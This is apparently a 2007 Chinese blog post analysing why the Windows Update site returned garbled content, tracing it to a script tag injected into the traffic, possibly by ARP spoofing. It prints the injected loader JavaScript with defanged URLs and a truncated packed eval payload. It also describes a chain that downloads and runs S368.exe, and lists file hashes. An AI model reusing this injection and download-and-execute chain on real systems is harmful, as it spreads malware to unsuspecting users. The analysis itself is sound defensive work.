Windows更新网站被黑还是被ARP病毒捉弄了?Virus.Win32.AutoRun.am
endurer 原创
2007-07-11 第1版
今早打开电脑,发现有Windows更新,自动更新速度有点慢,于是手动打开http://www.windowsupdate.com/,不料看到的是一堆乱码~
选择开始菜单中的“Windows Update”,打开 http://windowsupdate.microsoft.com/,显示与http://www.windowsupdate.com/ 相同。
检查IP地址。
D:/pe/test>ping www.windowsupdate.com
Pinging windowsupdate.microsoft.nsatc.net [207.46.225.221] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Ping statistics for 207.46.225.221:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
[查询结果] 您的查询: [ip地址] 207.46.225.221 => 207.46.225.221
·本站主数据: 美国 华盛顿州 雷德蒙市 Microsoft微软公司
·本站辅数据: 还没人提交数据
·参考数据一: 美国 Microsoft公司
·参考数据二: 美国
[查询提供] www.123cha.com
D:/pe/test>ping windowsupdate.microsoft.com
Pinging windowsupdate.microsoft.nsatc.net [207.46.18.94] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Ping statistics for 207.46.18.94:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
[查询结果] 您的查询: [ip地址] 207.46.18.94 => 207.46.18.94
·本站主数据: 美国 华盛顿州 雷德蒙市 Microsoft微软公司
·本站辅数据: 还没人提交数据
·参考数据一: 美国 Microsoft公司
·参考数据二: 美国
IP地址是正常的。
查看网页源代码,如下:
/---
<script src=hxxp://c***k*1*.in/N**.JS></script> 刉mo??`釥}T蒊[琺lo 晇蹢倴?娫H蕩wまщH馑蓠罟鐜勿,辜餷6}/g?螔溷速蹴Q瘃|簒y翓(榐蛽?={頦彚#rk索q驾n#mX)綆5砛fp宥 E?
?倹興蔭蚢R犳)??
?窪鹻罶瓕Z賵?叙/ =z ^紉謞+Y仯 C搄^Z甦@K?G竘嵙g.3?p[f?L? 営j蒙
?K^ ?羆Z砚V蜐??dM
?Zc2IgLg^蚝b耏 $狴绯雼愥啩dCs
蘩Ji丞Jw邯?H0;c别G淪`?傎})?鐥殑QG? w港*潤=4兜?0忿?6玜v?迈?剴?o>n搗彂貸莹G ?觸?hA闓R恝?=栟=湋X鸟`0鸪慊~褫?藿!?f魀!PJ^a[?@:?K彇 22遣侹n,岑H繰(R 缔浙
#?|ㄨ8J?]6晲斆%N?V?妘YP?J?W趵鵎洶闱<佔褷媇趎Th!p?{刄;?荆2鞵璆P長"%量畑F~藤昄?)#€?糘s&篆 =渵苦k蚛q頨笺v?EI酟T鍨|T伌閹堋鰀O螕嬞蕒鹽'Xw?+鼎邙?琟t?,】p]`疦H#畐O:?訕阼?汽猶踀鏦?撍賐鼦?g?f`l羔嚠S?謻6販Y*つ*?搐4LR??G烤>賑k?A箶P諄-塙璘託m
?
鲫荞?uZt^zN囔fv:j僔7箠9 ?!闷?椌軩酶?h1?樃耖1鹴2潔侽?&Y?M螾l蠻!? 简D(;禂祝'鷞;€K)_?
Go茋黳c嗥钎む壡DnC?礿睷妁i/噯5諴蔢W?曛祷涫妸.r?[?r[4m栖d?器v?」卿谘#闫1卷狒諑jb? 襾卻}涹4o;
安;x熨R忛=乗悛K沔u凿?=?守U駎駾姌)唱溟h饠鍓T濍#?侭@?颭|.?壌A卤d踞r湼"镰擃n?虝?# k射?,7 f]鶋/z._ 懀靵,?璠濠`s?Ь)夛I唛*徂倧楐?N稭腥昊?
炥9閚飱@S?F瞪i?l衮懱~?8?蔘銮(?錠?66?T/?擰=|臩擤餽Ku?^??z諘Bm]趏o. 0?勛萈k▆箅@v?? + 8{
U?S(?
臅??|?艄瞮卩?4HD偋?sn簧cW[|??枙礘7畟賀`z姵詚緑块?i魙c:??钝韛{P歕甌湒;妥箥r[`橿?}豹秣E犉栎t?U孱巌
9U篢醐罝?
h糍?HP频籟遇蟖<G?拮竪晦t凖?7n?
---/
D:/test>ping c***k*1*.in
Pinging c***k*1*.in [209.11.243.35] with 32 bytes of data:
Reply from 209.11.243.35: bytes=32 time=479ms TTL=116
Reply from 209.11.243.35: bytes=32 time=411ms TTL=116
Reply from 209.11.243.35: bytes=32 time=375ms TTL=116
Request timed out.
Ping statistics for 209.11.243.35:
Packets: Sent = 4, Received = 3, Lost = 1 (25% loss),
Approximate round trip times in milli-seconds:
Minimum = 375ms, Maximum = 479ms, Average = 316ms
您的查询: [ip地址] 209.11.243.35 => 209.11.243.35
·本站主数据: 美国
·本站辅数据: 还没人提交数据
·参考数据一: 美国
·参考数据二: 美国
hxxp://c***k*1*.in/N**.JS 源代码:
/---
document.writeln("<script src=/"hxxp:////c***k*1*//S368//NewJs**2.js/"><//script>");
document.writeln("<script>");
document.writeln("function Start(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = /"Cookie1=/" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition != -1){ ");
document.writeln("} else ");
document.writeln("{ document.cookie = /"Cookie1=POPWINDOS;expires=/"+ Then.toGMTString() ");
document.writeln("");
document.writeln("}");
document.writeln("}");
document.writeln("Start();");
document.writeln("<//script>")
---/
hxxp://c***k*1*.in/S368/NewJs**2.js 是使用eval()执行加密的代码:
/---
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'//w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('//b'+e(c)+'//b','g'),k[c]);return p}('1a("//i//g//e//h//j//2…(略)…|x2A|eval'.split('|'),0,{}))
---/
经过3次解密,得到原始代码。功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 S368.exe,保存到%windir%,文件名由自定义函数:
/---
function GnMs(n)
{
var numberMs = Math.random()*n;
return '~Temp'+Math.round(numberMs)+'.tmp';
---/
生成,即 ~Temp****.exe,其中****为 数字。然后通过 Shell.Application 对象 Q 的 ShellExecute 方法执行命令: %windir%/system32/cmd.exe /c %windir%/~Temp****.exe 来运行。
文件说明符 : D:/test/S368.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-7-11 8:39:29
修改时间 : 2007-7-11 8:39:29
访问时间 : 2007-7-11 8:40:0
大小 : 23087 字节 22.559 KB
MD5 : a0795ad6df991d65b38968ced427f09b
EXEStealth 2.0 - 2.4 -> WebtoolMaster
主 题: | RE: S368.exe [KLAB-2419187] | ||
发件人: | "" |
发送时间:2007-07-11 13:58:48 |
刚才又下载了检查,发现文件的MD5值变了:
文件说明符 : D:/test/s368.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-7-11 19:43:49
修改时间 : 2007-7-11 19:43:50
访问时间 : 2007-7-11 19:46:2
大小 : 23087 字节 22.559 KB
MD5 : e277b83f3eedac59ec0077bb981e4082